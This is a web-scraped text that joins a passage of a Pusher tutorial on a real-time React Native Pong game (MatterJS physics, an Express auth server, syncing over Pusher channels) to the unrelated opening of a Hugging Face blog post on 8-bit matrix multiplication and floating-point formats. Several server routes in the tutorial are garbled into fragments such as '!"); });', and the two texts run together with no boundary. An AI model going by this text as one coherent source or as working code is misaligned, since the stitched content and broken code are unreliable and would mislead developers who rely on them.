enterGame = async () => { const username = this.state.username; if (username) { this.setState({ enteredGame: true // show loading text }); this.pusher = new Pusher(pusher_app_key, { authEndpoint: `${base_url}/pusher/auth`, cluster: pusher_app_cluster, auth: { params: { username: username } }, encrypted: true }); this.myChannel = this.pusher.subscribe(`private-user-${username}`); this.myChannel.bind("pusher:subscription_error", status => { Alert.alert( "Error", "Subscription error occurred. Please restart the app" ); }); this.myChannel.bind("pusher:subscription_succeeded", () => { // next: add code for when the opponent is found }); } };
When the
opponent-found event is triggered by the server, this is the cue for the app to navigate to the game screen. But before that, we first subscribe to the opponent’s channel and determine which objects should be assigned to the current user. The game is set up in a way that the first player who logs in is always considered “player one”, and the next one is always “player two”. Player one always assumes the left side of the screen, while player two assumes the right side. Each player has a plank and a wall assigned to them. Most of the code below is used to determine which objects should be assigned to the current player:
this.myChannel.bind("opponent-found", data => { let opponent = username == data.player_one ? data.player_two : data.player_one; const playerOneObjects = { plank: "plankOne", wall: "leftWall", plankColor: "green" }; const playerTwoObjects = { plank: "plankTwo", wall: "rightWall", plankColor: "blue" }; const isPlayerOne = username == data.player_one ? true : false; const myObjects = isPlayerOne ? playerOneObjects : playerTwoObjects; const opponentObjects = isPlayerOne ? playerTwoObjects : playerOneObjects; const myPlank = myObjects.plank; const myPlankColor = myObjects.plankColor; const opponentPlank = opponentObjects.plank; const opponentPlankColor = opponentObjects.plankColor; const myWall = myObjects.wall; const opponentWall = opponentObjects.wall; Alert.alert("Opponent found!", `Your plank color is ${myPlankColor}`); this.opponentChannel = this.pusher.subscribe( `private-user-${opponent}` ); this.opponentChannel.bind("pusher:subscription_error", data => { console.log("Error subscribing to opponent's channel: ", data); }); this.opponentChannel.bind("pusher:subscription_succeeded", () => { this.props.navigation.navigate("Game", { pusher: this.pusher, username: username, myChannel: this.myChannel, opponentChannel: this.opponentChannel, opponent: opponent, isPlayerOne: isPlayerOne, myPlank: myPlank, opponentPlank: opponentPlank, myPlankColor: myPlankColor, opponentPlankColor: opponentPlankColor, myWall: myWall, opponentWall: opponentWall }); }); this.setState({ username: "", enteredGame: false }); });
Next, add the styles for the login screen. You can get it from this file.
Server code
Create a
server folder inside the root of the React Native project. Inside, create a
package.json file with the following contents:
{ "name": "pong-authserver", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "start": "node server.js" }, "author": "", "license": "ISC", "dependencies": { "body-parser": "^1.17.2", "dotenv": "^4.0.0", "express": "^4.15.3", "pusher": "^1.5.1" } }
Execute
yarn install to install the dependencies.
Next, create a
.env file and add your Pusher app credentials:
APP_ID="YOUR PUSHER APP ID" APP_KEY="YOUR PUSHER APP KEY" APP_SECRET="YOUR PUSHER APP SECRET" APP_CLUSTER="YOUR PUSHER APP CLUSTER"
Next, import all the packages we need and initialize Pusher:
// server/server.js var express = require('express'); var bodyParser = require('body-parser'); var Pusher = require('pusher'); require('dotenv').config(); var app = express(); app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: false })); var pusher = new Pusher({ appId: process.env.APP_ID, key: process.env.APP_KEY, secret: process.env.APP_SECRET, cluster: process.env.APP_CLUSTER, });
Next, we add the route for authenticating the user. I said authentication, but to simplify things, we’re going to skip the actual authentication. Normally, you would have a database for checking whether the user has a valid account before you call the
pusher.authenticate method:
var users = []; app.post("/pusher/auth", function(req, res) { var socketId = req.body.socket_id; var channel = req.body.channel_name; var username = req.body.username; users.push(username); // temporarily store the username to be used later console.log(username + " logged in"); var auth = pusher.authenticate(socketId, channel); res.send(auth); });
Next, add the route for triggering the event for informing the users that an opponent was found. When you access this route on the browser, it will show an alert that an opponent is found, and the game screen will show up. Again, this isn’t what you’d do in a production app. This is only a demo, so this is done to have finer control over when things are triggered:!"); });
Lastly, the start game route is what triggers the ball to actually start moving:!"); }); // run the server on a specific port var port = 5000; app.listen(port);
Game screen
Let’s go back the app itself. This time, we proceed to coding the game screen. Start by importing the packages and components we need:
// src/screens/Game.js import React, { PureComponent } from 'react'; import { View, Text, Alert } from "react-native"; import { GameEngine } from "react-native-game-engine"; import Matter from "matter-js"; import Circle from '../components/Circle'; // for rendering the ball import Box from '../components/Box'; // for rendering the planks and walls
Next, we declare the size of the objects. Here, we’re using hard-coded dimensions to constrain the world to a single size. Because someone might be playing the game on a tablet, and their opponent is only playing on a phone with a small screen. This means that the ball will travel longer distances compared the phone, and the UI won’t be perfectly synced:
import React, { PureComponent } from "react"; import { View, Text, Dimensions, Alert } from "react-native"; import { GameEngine } from "react-native-game-engine"; import Circle from "../components/Circle"; import Box from "../components/Box"; import Matter from "matter-js"; const BALL_SIZE = 50; const PLANK_HEIGHT = 70; const PLANK_WIDTH = 20; const GAME_WIDTH = 650; const GAME_HEIGHT = 340; const BALL_START_POINT_X = GAME_WIDTH / 2 - BALL_SIZE; const BALL_START_POINT_Y = GAME_HEIGHT / 2; const BORDER = 15; const WINNING_SCORE = 5;
Next, we specify the properties of the objects in the game. These properties decide how they move through space and respond to collisions with other objects:
const plankSettings = { isStatic: true }; const wallSettings = { isStatic: true }; const ballSettings = { inertia: 0, friction: 0, frictionStatic: 0, frictionAir: 0, restitution: 1 };
Here’s what each property does. Note that most of these properties are only applicable to the ball. All the ones applied to other objects are simply used to replace the default values:
- isStatic - used for specifying that the object is immovable. This means that it won’t change position no matter the amount of force applied to it by another object.
- inertia - the amount of external force it takes to move a specific object. We’re specifying a value of
0for the ball so it requires no force at all to move it.
- friction - used for specifying the kinetic friction of the object. This can have a value between
0and
1. A value of
0means that the object doesn’t produce any friction when it slides through another object which has also a friction of
0. This means that when a force is applied to it, it will simply slide indefinitely until such a time that another force stops it.
1is the maximum amount of friction. And any value between it and
0is used to control the amount of friction it produces as it slides to through or collides with another object. For the ball, we’re specifying a friction of
0so it can move indefinitely.
- frictionStatic - aside from
inertia, this is another property you can use to specify how much harder it will be to move a static object. So a higher value will require a greater amount of force to move the object.
- frictionAir - used for specifying the air resistance of an object. We’re specifying a value of
0so the ball can move indefinitely through space even if it doesn’t collide to anything.
- restitution - used for specifying the bounce of the ball when it collides with walls and planks. It can have a value between
0and
1.
0means it won’t bounce at all when it collides with another object. So
1produces the maximum amount of bounce.
Next, create the actual objects using the settings from earlier. In MatterJS, we can create objects using the
Matter.Bodies module. We can create different shapes using the methods in this module. But for the purpose of this tutorial, we only need to create a circle (ball) and a rectangle (planks and walls). The
circle and
rectangle methods both require the initial
x and
y position of the object as their first and second arguments. As for the third one, the
circle method requires the radius of the circle. While the
rectangle method requires the width and the height. The last argument is the object’s properties we declared earlier. In addition, we’re also specifying a
label to make it easy to determine the object we’re working with. The
isSensor is set to
true for the left and right walls so they will only act as a sensor for collisions instead of affecting the object which collides to it. This means that the ball will simply pass through those walls:
const ball = Matter.Bodies.circle( BALL_START_POINT_X, BALL_START_POINT_Y, BALL_SIZE, { ...ballSettings, label: "ball" } ); const plankOne = Matter.Bodies.rectangle( BORDER, 95, PLANK_WIDTH, PLANK_HEIGHT, { ...plankSettings, label: "plankOne" } ); const plankTwo = Matter.Bodies.rectangle( GAME_WIDTH - 50, 95, PLANK_WIDTH, PLANK_HEIGHT, { ...plankSettings, label: "plankTwo" } ); const topWall = Matter.Bodies.rectangle( GAME_HEIGHT - 20, -30, GAME_WIDTH, BORDER, { ...wallSettings, label: "topWall" } ); const bottomWall = Matter.Bodies.rectangle( GAME_HEIGHT - 20, GAME_HEIGHT + 33, GAME_WIDTH, BORDER, { ...wallSettings, label: "bottomWall" } ); const leftWall = Matter.Bodies.rectangle(-50, 160, 10, GAME_HEIGHT, { ...wallSettings, isSensor: true, label: "leftWall" }); const rightWall = Matter.Bodies.rectangle( GAME_WIDTH + 50, 160, 10, GAME_HEIGHT, { ...wallSettings, isSensor: true, label: "rightWall" } ); const planks = { plankOne: plankOne, plankTwo: plankTwo };
Next, we add all the objects to the “world”. In MatterJS, all objects that you need to interact with one another need to be added to the world. This allows them to be simulated by the “engine”. The engine is used for updating the simulation of the world:
const engine = Matter.Engine.create({ enableSleeping: false }); const world = engine.world; Matter.World.add(world, [ ball, plankOne, plankTwo, topWall, bottomWall, leftWall, rightWall ]);
In the above code,
enableSleeping is set to
false to prevent the objects from sleeping. This is a state similar to adding the
isStatic property to the object, the only difference is that objects that are asleep can be woken up and continue their motion. As you’ll see later on, we’re actually going to make the ball sleep manually as a technique for keeping the UI synced.
Next, create the component and initialize the state. Note that we’re using a
PureComponent instead of the usual
Component. This is because the game screen needs to be pretty performant.
PureComponent automatically handles the
shouldComponentUpdate method for you. When props or state changes,
PureComponent will do a shallow comparison on both props and state. And the component won’t actually re-render if nothing has changed:
export default class Game extends PureComponent { static navigationOptions = { header: null // we don't need a header }; state = { myScore: 0, opponentScore: 0 }; // next: add constructor }
The constructor is where we specify the systems to be used by the React Native Game Engine and subscribe the user to their opponent’s channel. Start by getting all the navigation params that we passed from the login screen earlier:
constructor(props) { super(props); const { navigation } = this.props; this.movePlankInterval = null; this.pusher = navigation.getParam("pusher"); this.username = navigation.getParam("username"); this.myChannel = navigation.getParam("myChannel"); this.opponentChannel = navigation.getParam("opponentChannel"); this.isPlayerOne = navigation.getParam("isPlayerOne"); const myPlankName = navigation.getParam("myPlank"); const opponentPlankName = navigation.getParam("opponentPlank"); this.myPlank = planks[myPlankName]; this.opponentPlank = planks[opponentPlankName]; this.myPlankColor = navigation.getParam("myPlankColor"); this.opponentPlankColor = navigation.getParam("opponentPlankColor"); this.opponentWall = navigation.getParam("opponentWall"); this.myWall = navigation.getParam("myWall"); const opponent = navigation.getParam("opponent"); // next: add code for adding systems }
Next, add the systems for the physics engine and moving the plank. The React Native Game Engine doesn’t come with a physics engine out of the box. Thus, we use MatterJS to handle the physics of the game. Later on, in the component’s
render method, we will pass
physics and
movePlank as systems:
this.physics = (entities, { time }) => { let engine = entities["physics"].engine; engine.world.gravity.y = 0; // no downward pull Matter.Engine.update(engine, time.delta); // move the simulation forward return entities; }; this.movePlank = (entities, { touches }) => { let move = touches.find(x => x.type === "move"); if (move) { const newPosition = { x: this.myPlank.position.x, // x is constant y: this.myPlank.position.y + move.delta.pageY // add the movement distance to the current Y position }; Matter.Body.setPosition(this.myPlank, newPosition); } return entities; }; // next: add code for binding to events for syncing the UI
All the
entities (the objects we added earlier) that are added to the world are passed to each of the systems. Each entity has properties like
time and
touches which you can manipulate. In the case of the physics engine, the engine is considered as an entity. In the code below, we’re manipulating the world’s Y gravity (downward pull) to be equal to zero. This means that the objects won’t be pulled downwards as the simulation goes on.
The
movePlank system is used for moving the plank. So we extract the
touches from the entities.
touches contains an array of all the touches the user performed. Each item in the array contains all sorts of data about the touch, but we’re only concerned with the
type. The
type can be
touch,
press, or in this case,
move.
move is when the user moves their finger/s across the screen. Since we only need to listen for this one event, we don’t actually need to target the plank precisely. Which means that the user doesn’t have to place their index finger on their assigned plank in order to move it. They simply have to move their finger across the screen, and the distance from that movement will automatically be added to the current Y position of their plank. Of course, this considers the direction of the movement as well. So if the direction is upwards, then the value of
move.delta.pageY will be negative.
Next, we bind to the events that will be triggered by the opponent. These will keep the UI of the two players synced. First is the event for syncing the planks. This updates the UI to show the current position of the opponent’s plank:
this.myChannel.bind("client-opponent-moved", opponentData => { Matter.Body.setPosition(this.opponentPlank, { x: this.opponentPlank.position.x, y: opponentData.opponentPlankPositionY }); }); // next: listen to the event for moving the ball
Next, add the event which updates the balls current position and velocity. The way this works is that the two players will continuously pass the ball’s current position and velocity to one another. Between each pass, we add a 200-millisecond delay so that the ball actually moves between each pass. Making the ball sleep between each pass is important because the ball will look like it’s going back and forth a few millimeters while it’s reaching its destination:
this.myChannel.bind("client-moved-ball", ({ position, velocity }) => { Matter.Sleeping.set(ball, false); // awaken the ball so it can move Matter.Body.setPosition(ball, position); Matter.Body.setVelocity(ball, velocity); setTimeout(() => { if (position.x != ball.position.x || position.y != ball.position.y) { this.opponentChannel.trigger("client-moved-ball", { position: ball.position, velocity: ball.velocity }); Matter.Sleeping.set(ball, true); // make the ball sleep while waiting for the event to be triggered by the opponent } }, 200); }); // next: add code for sending plank updates to the opponent
Next, trigger the event for updating the opponent’s screen of the current position of the user’s plank. This is executed every 300 milliseconds so we’re still within the 10 messages per second limit per client:
setInterval(() => { this.opponentChannel.trigger("client-opponent-moved", { opponentPlankPositionY: this.myPlank.position.y }); }, 300); // next: add code for updating player two's score
Next, we bind to the event for updating the scores on player two’s side. Player one (the first user who logs in) is responsible for triggering this event:
if (!this.isPlayerOne) { this.myChannel.bind( "client-update-score", ({ playerOneScore, playerTwoScore }) => { this.setState({ myScore: playerTwoScore, opponentScore: playerOneScore }); } ); } // next: add componentDidMount
Once the component is mounted, we wait for the
start-game event to be triggered by the server before accelerating the ball. Once the ball is accelerated, we initiate the back and forth passing of the ball’s position and velocity. This is the reason why only player one runs this code:
componentDidMount() { if (this.isPlayerOne) { this.myChannel.bind("start-game", () => { Matter.Body.setVelocity(ball, { x: 3, y: 0 }); // throw the ball straight to the right this.opponentChannel.trigger("client-moved-ball", { position: ball.position, velocity: ball.velocity }); Matter.Sleeping.set(ball, true); // make the ball sleep and wait for the same event to be triggered on this side }); // next: add scoring code } }
Next, we need to handle collisions. We already know that the ball can collide with any of the objects we added into the world. But if it hits either the left wall or right wall, the player who hit it will score a point. And since this block of code is still within the
this.isPlayerOne condition, we also need to trigger an event for informing player two of the score change:
Matter.Events.on(engine, "collisionStart", event => { var pairs = event.pairs; var objA = pairs[0].bodyA.label; var objB = pairs[0].bodyB.label; if (objA == "ball" && objB == this.opponentWall) { this.setState( { myScore: +this.state.myScore + 1 }, () => { // bring back the ball to its initial position Matter.Body.setPosition(ball, { x: BALL_START_POINT_X, y: BALL_START_POINT_Y }); Matter.Body.setVelocity(ball, { x: -3, y: 0 }); // inform player two of the change in scores this.opponentChannel.trigger("client-update-score", { playerOneScore: this.state.myScore, playerTwoScore: this.state.opponentScore }); } ); } else if (objA == "ball" && objB == this.myWall) { this.setState( { opponentScore: +this.state.opponentScore + 1 }, () => { Matter.Body.setPosition(ball, { x: BALL_START_POINT_X, y: BALL_START_POINT_Y }); Matter.Body.setVelocity(ball, { x: 3, y: 0 }); this.opponentChannel.trigger("client-update-score", { playerOneScore: this.state.myScore, playerTwoScore: this.state.opponentScore }); } ); } });
Next, add the
render function. The majority of the rendering is taken care of by the React Native Game Engine. To render the objects, we pass them as the value for the
entities prop. This accepts an object containing all the objects that we want to render. The only required property for an object is the
body and the
renderer, the rest are props to be passed to the renderer itself. Note that you also need to pass the
engine and the
world as entities:
render() { return ( <GameEngine style={styles.container} systems={[this.physics, this.movePlank]} entities={{ physics: { engine: engine, world: world }, pongBall: { body: ball, size: [BALL_SIZE, BALL_SIZE], renderer: Circle }, playerOnePlank: { body: plankOne, size: [PLANK_WIDTH, PLANK_HEIGHT], color: "#a6e22c", renderer: Box, xAdjustment: 30 }, playerTwoPlank: { body: plankTwo, size: [PLANK_WIDTH, PLANK_HEIGHT], color: "#7198e6", renderer: Box, type: "rightPlank", xAdjustment: -33 }, theCeiling: { body: topWall, size: [GAME_WIDTH, 10], color: "#f9941d", renderer: Box, yAdjustment: -30 }, theFloor: { body: bottomWall, size: [GAME_WIDTH, 10], color: "#f9941d", renderer: Box, yAdjustment: 58 }, theLeftWall: { body: leftWall, size: [5, GAME_HEIGHT], color: "#333", renderer: Box, xAdjustment: 0 }, theRightWall: { body: rightWall, size: [5, GAME_HEIGHT], color: "#333", renderer: Box, xAdjustment: 0 } }} > <View style={styles.scoresContainer}> <View style={styles.score}> <Text style={styles.scoreLabel}>{this.myPlankColor}</Text> <Text style={styles.scoreValue}> {this.state.myScore}</Text> </View> <View style={styles.score}> <Text style={styles.scoreLabel}>{this.opponentPlankColor}</Text> <Text style={styles.scoreValue}> {this.state.opponentScore}</Text> </View> </View> </GameEngine> ); }
Note that the
xAdjustment and
yAdjustment are mainly used for adjusting the
x and
y positions of the objects. This is because the formula (see
src/components/Box.js) that we’re using to calculate the
x and
y positions of the object doesn’t accurately adjust it to where it needs to be. This results in the ball seemingly bumping into an invisible wall before it actually hits the plank. This is because of the difference between the actual position of the object in the world (as far as MatterJS is concerned) and where it’s being rendered on the screen.
You can view the styles for the Game screen here.
Here’s the code for the Circle and Box components:
// src/components/Circle;
// src/components/Box;
At this point you can now run the app:
cd server node server.js ./ngrok http 5000 cd .. react-native run-android
Here are the steps that I used for testing the app:
- Login user “One” on Android device #1.
- Login user “Two” on Android device #2.
- Access the
/opponent-foundroute from the browser. This should show an alert on both devices that an opponent was found.
- Access the
/start-gameroute from the browser. This should start moving the ball.
At this point, the two players can now start moving their planks and play the game.
Conclusion
In this tutorial, you learned how to create a realtime game with React Native and Pusher Channels. Along the way, you also learned how to use the React Native Game Engine and MatterJS.
There’s a hard limit of 10 messages per second, which stopped us from really going all out with syncing the UI. But the game we created is actually acceptable in terms of performance.
You can find the code on this GitHub repo.
February 20, 2019
by Wern Ancheta | https://pusher.com/tutorials/react-native-pong-game | CC-MAIN-2021-25 | refinedweb | 4,526 | 50.53 |
Michael !
Try this script for the Arduino.
You should see an Arduino service start up, wait a bit - for some reason initialization of the com port takes a while on windows 7 64 bit - the delay is from the native dlls in the RXTXCom module
After about 8 or 10 seconds - flip over to the oscope and see if a analog trace on pin A0 is running...
The previous script takes
The previous script takes about 20 seconds to start up on my system - this is all because of the way RXTXComm behaves on windows 7...
I've noticed Arduino IDE takes the same amount of time to start.
This happens:
That looks like - a lot of
That looks like - a lot of nothing ...
hmmm... try updating
help->about->I feel lucky
restart
try again - wait on the jython console for 20 seconds - if it starts up correctly you should see alot of debug logging scroll by in the java console
if it still "no-worky"
click the help->about->GroG, it no worky button
You'll be the first to test my new auto-send log & debug report system !
I'll try it again :)
I'll try it again :)
Got the log file, thanks
Got the log file, thanks ...
it "looks" like the board is sending info back .. don't know why the oscope is not updating...
I'll have to look at this some more...
Okay :) BTW, congratulations!
Okay :)
BTW, congratulations! your "no-worky" button worked. Cheers to that :D
Um ..
"Sort of work", I got your log file but it was 2 Megs of pin data coming from the Arduino :P ... not much else,, which I'm a little suprised about ... I thought it would be "everything"
It looks like stuff is working, its just not updating the display... try waiting on the jython page until, you begin to see data scroll by in the Java console.. if you've already done this, try it - but before you execute the script - go to the menu
System -> Logging -> Level -> INFO
This should clear out all the publishPin log statements - make note - you shouldn't see anything scrolling now...
There's no analog trace when
There's no analog trace when I tried it again. (with the system-logging-level-info...) ,
But, I noticed a different value from the recent picture that I posted. The differences are:
the mean, min. the min from the recent picture shows 0.
Here's the pic:
HA ! It is working, you just
HA !
It is working, you just have it off the scale !!!
You've got that pin tied to 5 Volts ;D
Untie it from 5 volts and just stick a wire in it - the wire gives it plenty of deviation, so you can see the trace... but @ 5 Volts its off the screen !
I'm looking into making the
I'm looking into making the screen size as big as 1024 now ... thanks for finding that bug ;)
Figured it out!
The values are off the chart because the servo shield provides 2 pushbuttons connected to pins A1 and A0.
Do we have to really use the script? cause the pushbutton is permanent. Thus, A0 will just give us "off-the-charts" value XD
More available options are good
We can do it with or without script, however, your MRL will become more and more complex - because your going to add more devices and more functionality.
To initialize all that, its much more convienent use a script, some things like message routing is more challenging to do graphically.
I'm not suggesting we use our current Arduino script, obviously it doesn't currently work for your system...
No worries... I was just trying to make sure your Arduino will be responsive to "a script"...
Alright,
So do you have any free analog pins ? - Just restart and change the pin value in the script to a free pin - then you can use it as a valid sensor...
Also,
to move on... what does your robot do now? Can you attach a current PDE script your using for it? Does it drive around in a circle, bump into walls and try a different route?
Okay. I've tried it again but
Okay. I've tried it again but no luck. I've hit No Worky now :)
Finally!
Finally it worked :)
Great - So let's get
Great - So let's get organized now...
At the bottom of your post you currently have a working OpenCV script, and now we have a working Arduino script, we will continue to build scripts around the Services independently - until we like the results - So add the Arduino under the OpenCV
e.g.
# OpenCV Script
# Purpose - initializing the OpenCV service and start color filtering & publishing of coordinates
# of the contours found
.....
# Arduino script
.... etc
# PID script
etc...
After that - the next step is getting them all to talk to one another ..
So it should look like this?(
So it should look like this?( disregard th "/". Just to avoid confusion)
# /////////////////////////////////////////// OPENCV///////////////////////////////////////////////////////////
from java.lang import String
Right, I put #'s in front of
Right, I put #'s in front of the dividers - because these are comments in Python...
So to get off where you left, you just have to copy/paste the whole script in..
Still working on the Shield... I'll keep you posted..
Take your time :)
Take your time :)
Servo Shield question.. Can
Servo Shield question..
Can you test the shield without MRL ?
E.g. can you drop the shield library in and test moving the pan/tilt kit ?
Can you post your Arduino Shield code you used to test the pan/tilt kit? I suspect it would be very similar to the example from the library...
I want to make sure we have a "controlled" test... such that we know the library, arduino, shield & servos work in at least one context ... then we can try them & the new service in MRL
Here's a code moving the
Here's a code moving the pan/tilt servos using 2 potentiometers:
////////////////start of arduino code//////////////
#include <ServoControl.h>
Excellent, thank you ... that
Excellent, thank you ... that is very helpful - thanks for the video too
If a "picture says a 1000 words" a video says 30K words per seconds ;)
It seems a bit jittery and a bit flakey in response in the video ? Do the servo's brown-out (stop working when you move them too fast) ? Some of that could be that they might be underpowered.
What is your feelings regarding the control of the servos? What things have you noticed?
Servos are not the problem :)
Servos are not the problem :) It's jittery because of the potentiometers I used. My wirings are not stable. Thus, giving an unstable values. :)
BTW, how's the progress? are we near completion? I'm so excited cause when we accomplished this project, there's infinite of possiblities we can make in the future.
After accomplishing this, I am thinking of a robot arm that tracks a color so we can apply this project and grab that object when the desired distance between the object is met. Is this possible? :))
Ok, the more unstable the
Ok, the more unstable the lower levels are (hardware & connection) - the more difficult it is to track (just so you know), it's always best to attempt to filter out noise at its source, rather than make software that compensates...
Progress is good, in that I know how I want to implement this, additionally, it will be helpful that you have a controlled way of moving the servos - so we can compare..
Still have a bit to do... and I have other responsibilities too :)
but I'm trying to get done..
Sure its all possible,
If I could get done with this I could start working on the 3D Point Cloud SLAM with a kinect :D which would give a robot a 3D map to navigate through
I posted the MasterAndBrains
I posted the GlueAndBrains Python script and MRLComm2 script in your post.
I suggest try the following :
If something flakey happens I would recommend at some point - downloading the latest (complete package) as your post illustrates, should be intermediate.777.20120908.2154 or later
I can't test this obviously since I don't have the hardware.... :)
Good Luck...
Umm. There's a problem :(
I've uploaded the arduino code, updated the MRL, ran the jython script but there's no movement at all.
the opencv service seems working correctly because it only tracks one color. Here's a screenshot:
And, I just have a question:
The Arduino did not come up -
The Arduino did not come up - not sure why....
The details of which servo are not in the Arduino code, but are now in the Python...
Specifically, it's in the Python shield code...
Looking at your log file now - can you try just the Arduino's Python, I would expect to see a tab after you run it...
I've sent you another logfile
I've sent you another logfile :))
I tried and ran it again. The arduino tab opened. Unfortunately, it does not work again :(
Here's a pic:
Hmmm.. don't see any ERRORs
Hmmm.. don't see any ERRORs in that one...
In the future, don't put in the OpenCV stuff ... let's isolate it to the Arduino & Shield only...
I think that's the best step
I think that's the best step for now since the OpenCV is running properly. In isolating the arduino and shield, we can specifically determine the problem.
BTW, I don't know if I asked this question already. My question is, can we directly send the x,y values to the arduino via serial and there we will just map the values? But it's good to have a specific service for us to control the servos in the servo shield.
When you start the arduino
When you start the arduino and shield only.. does the analog trace come up on the oscope as before?
Yes it does :) Here's a pic
Yes it does :)
Here's a pic for
confirmation:
That's good, There are no
That's good,
There are no ERRORs in the log - (thanks for the new one)...
I did noticed .. shield.start() was getting twice, so I removed the second call, and removed a servo just to reduce complexity.
So the python script now is
So the python script now is edited and I should try it again isn't it? :))
Yes, Make sure you don't
Yes,
Make sure you don't have any updates with the "bleeding edge button"
Then give it a try with the new Jython script (leave OpenCV out of again)
what do you mean about :
what do you mean about : leave OpenCV out of again?
I tried the new script but it isn't working. The thing is, the servos are jittering but not as close to the position of the color.
BTW, I do have a realization about how the pan/tilt are tracking color. Isn't that, for example:
The color have the coordinates 160,150. Then, the servos are going to position based on the x,y coordinates mapped to 500-2400 uS. At the time that the color is set on the center of the camera based on the coordinates, say for example, it's coordinates will be now 90,90 (but the real position of the color is at 160,150) So, the servos will follow the 90,90 coordinates and the color will now be out of line of sight.
Is this problem is resolved by using PID?
Sorry, I've been studying PID since yesterday :))
For me, the best step for now is to verify Aceduino Shield service runs successfully. In order to that, can we try to use the scrollbar/trackbar in the service to position the desired servo?
"what do you mean about :
"what do you mean about : leave OpenCV out of it again?" <- I mean when you run the Python script just use from the # //////////////////////////////////////////////////////////////// ARDUINO ///////////////////////////////////////////////////////////
down.... don't copy in the OpenCV part
"I tried the new script but it isn't working. The thing is, the servos are jittering but not as close to the position of the color."
Really? This might be a case of it working when you think it's not :P - At this point I don't expect it to follow the color target. I want to validate the shield is working with the Arduino and Shield service.
This is the key part of the code:
This key part of the code
This key part of the code somehow actually works!:
Great news ! Can you give me
Great news !
Can you give me more info ?
Can you give me the steps involved now in making this work ?
If you shut it down, can you restart & get it to behave correctly again ? consistently ?
Last night it worked properly
Last night it worked properly as the key part of the code states. But when I tried it again today, servo port 7 (as stated in the code) don't move :(
Servo port 7 is to be used right? I'll try it again today and post some results later. I will try to work it again.
I will send you a logfile now to verify the script's working :)
These should be your steps
These should be your steps :
Is this key part of the
Is this key part of the script runs for a loop? cause I noticed (hopefully) some movements like it goes for 90 degrees then about 150 degress then nothing.
this key part I'm referring to:
It sounds like its working
It sounds like its working !
It's not a loop !
Just keep adding stuff .... I just wanted confirmation that it has control of the servo.
To put it in a for loop do the following,
this should move the servo from position 0 to 90 to 180 then back to 0 for 30 times.
Careful of the indentation.. Python is very picky when it comes to the code lining up.
Do I have to add it in the
Do I have to add it in the main aceduino shield code?
I have made getting to our
I have made getting to our position in color tracking much easier.
You will need to download the full zip (do not just update throught the bleeding edge button). This is necessary because contents of the repository have changed.
Once you have downloaded it and unzipped it - right-click -> install AceduinoMotorShield
This will download all the necessary components for the ACEduino motor shield to work (I hope :) ....
Including, downloading the Aceduino motor shield library, and putting it in the correct place.
Pretty cool, huh ?
Now in the jython's service tab is the script we are working on .
You can remove the OpenCV part - to make it simpler.
When you execute it should start an Arduino & ACEduinoMotorShield.
Additionally, the Arduino service now comes with examples -
a MRLComm example which is basic arduino communication without any shield libraries
and now ACEduinoMotorShield (soon to have AdafruitMotorShield too)
Can I directly upload the
Can I directly upload the AceuinoMotorShield.ino now in the arduino service?:)
You "should" be able too...
You "should" be able too... It's still a little flakey, but I'm refactoring as quickly as I can :)
It's no work GroG. However,
It's no work GroG. However, I've sent you the logfile now :)
I think we should just resort to using the Original Servo lib. For now, I will not use the servoshield.
Fortunately, it has 2 digital sensor pins(2,3) that can be used as ports for pan/tilt kit (perfect!). 1 port have I/O (can be used as input for the servo) GND, and Power supply.
I'm sorry for the time you wasted in adapting the aceduino motor shield to MRL. I'm still hoping that we can accomplish this project :))
Not time wasted, just
Not time wasted,
just getting closer to borg'ing in another piece of hardware ;) !
Anyway, if your going to use the regular Servo library then you need to upload - the original MRLComm.ino
It's the Arduino ino which comes loaded by default in the Arduino editor - please try the following and tell me the results :
Good luck
GroG it's working now!
GroG it's working now! :)
However, it's not running in a loop. The servos just run as what the script's written.
Let's try now the full script :)
Please change the servo script cause it's still in the loop :) | http://myrobotlab.org/content/color-tracking-mrl-using-opencv-jython-and-arduino-services | CC-MAIN-2019-47 | refinedweb | 2,791 | 81.53 |
A Gentle Introduction to 8-bit Matrix Multiplication for transformers at scale using Hugging Face Transformers, Accelerate and bitsandbytes
Introduction
Language models are becoming larger all the time. At the time of this writing, PaLM has 540B parameters, OPT, GPT-3, and BLOOM have around 176B parameters, and we are trending towards even larger models. Below is a diagram showing the size of some recent language models.
Therefore, these models are hard to run on easily accessible devices. For example, just to do inference on BLOOM-176B, you would need to have 8x 80GB A100 GPUs (~$15k each). To fine-tune BLOOM-176B, you'd need 72 of these GPUs! Much larger models, like PaLM would require even more resources.
Because these huge models require so many GPUs to run, we need to find ways to reduce these requirements while preserving the model's performance. Various technologies have been developed that try to shrink the model size, you may have heard of quantization and distillation, and there are many others.
After completing the training of BLOOM-176B, we at HuggingFace and BigScience were looking for ways to make this big model easier to run on less GPUs. Through our BigScience community we were made aware of research on Int8 inference that does not degrade predictive performance of large models and reduces the memory footprint of large models by a factor or 2x. Soon we started collaboring on this research which ended with a full integration into Hugging Face
transformers. With this blog post, we offer LLM.int8() integration for all Hugging Face models which we explain in more detail below. If you want to read more about our research, you can read our paper, LLM.int8(): 8-bit Matrix Multiplication for Transformers at Scale.
This article focuses on giving a high-level overview of this quantization technology, outlining the difficulties in incorporating it into the
transformers library, and drawing up the long-term goals of this partnership.
Here you will learn what exactly make a large model use so much memory? What makes BLOOM 350GB? Let's begin by gradually going over a few basic premises.
Common data types used in Machine Learning
We start with the basic understanding of different floating point data types, which are also referred to as "precision" in the context of Machine Learning.
The size of a model is determined by the number of its parameters, and their precision, typically one of float32, float16 or bfloat16 (image below from:).
Float32 (FP32) stands for the standardized IEEE 32-bit floating point representation. With this data type it is possible to represent a wide range of floating numbers. In FP32, 8 bits are reserved for the "exponent", 23 bits for the "mantissa" and 1 bit for the sign of the number. In addition to that, most of the hardware supports FP32 operations and instructions.
In the float16 (FP16) data type, 5 bits are reserved for the exponent and 10 bits are reserved for the mantissa. This makes the representable range of FP16 numbers much lower than FP32. This exposes FP16 numbers to the risk of overflowing (trying to represent a number that is very large) and underflowing (representing a number that is very small).
For example, if you do
10k * 10k you end up with
100k which is not possible to represent in FP16, as the largest number possible is
64k. And thus you'd end up with
NaN (Not a Number) result and if you have sequential computation like in neural networks, all the prior work is destroyed.
Usually, loss scaling is used to overcome this issue, but it doesn't always work well.
A new format, bfloat16 (BF16), was created to avoid these constraints. In BF16, 8 bits are reserved for the exponent (which is the same as in FP32) and 7 bits are reserved for the fraction.
This means that in BF16 we can retain the same dynamic range as FP32. But we lose 3 bits of precision. Now there is absolutely no problem with huge numbers, but the precision is worse than FP16 here.
